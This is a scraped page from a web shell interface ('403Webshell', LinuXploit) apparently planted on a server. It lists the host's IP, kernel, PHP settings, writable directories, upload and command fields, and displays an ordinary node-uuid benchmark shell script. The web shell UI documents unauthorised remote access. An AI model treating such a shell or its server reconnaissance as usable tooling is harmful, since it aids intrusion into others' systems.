403Webshell
Server IP : 157.230.181.24  /  Your IP : 216.73.216.101
Web Server : Apache/2.4.58 (Ubuntu)
System : Linux conductive 6.8.0-117-generic #117-Ubuntu SMP PREEMPT_DYNAMIC Tue May 5 19:26:24 UTC 2026 x86_64
User :  ( 1000)
PHP Version : 8.3.31
Disable Function : NONE
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : OFF  |  Sudo : ON  |  Pkexec : OFF
Directory :  /var/www/vhosts/convo/node_modules/node-uuid/benchmark/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ Back ]     

Current File : /var/www/vhosts/convo/node_modules/node-uuid/benchmark/bench.sh
#!/bin/bash

# for a given node version run:
# for i in {0..9}; do node benchmark.js >> bench_0.6.2.log; done;

PATTERNS=('nodeuuid.v1()' "nodeuuid.v1('binary'," 'nodeuuid.v4()' "nodeuuid.v4('binary'," "uuid()" "uuid('binary')" 'uuidjs.create(1)' 'uuidjs.create(4)' '140byte')
FILES=(node_uuid_v1_string node_uuid_v1_buf node_uuid_v4_string node_uuid_v4_buf libuuid_v4_string libuuid_v4_binary uuidjs_v1_string uuidjs_v4_string 140byte_es)
INDICES=(2 3 2 3 2 2 2 2 2)
VERSIONS=$( ls bench_*.log | sed -e 's/^bench_\([0-9\.]*\)\.log/\1/' | tr "\\n" " " )
TMPJOIN="tmp_join"
OUTPUT="bench_results.txt"

for I in ${!FILES[*]}; do
  F=${FILES[$I]}
  P=${PATTERNS[$I]}
  INDEX=${INDICES[$I]}
  echo "version $F" > $F
  for V in $VERSIONS; do
    (VAL=$( grep "$P" bench_$V.log | LC_ALL=en_US awk '{ sum += $'$INDEX' } END { print sum/NR }' ); echo $V $VAL) >> $F
  done
  if [ $I == 0 ]; then
    cat $F > $TMPJOIN
  else
    join $TMPJOIN $F > $OUTPUT
    cp $OUTPUT $TMPJOIN
  fi
  rm $F
done

rm $TMPJOIN

gnuplot bench.gnu
convert -density 200 -resize 800x560 -flatten bench.eps bench.png
rm bench.eps

Youez - 2016 - github.com/yon3zu
LinuXploit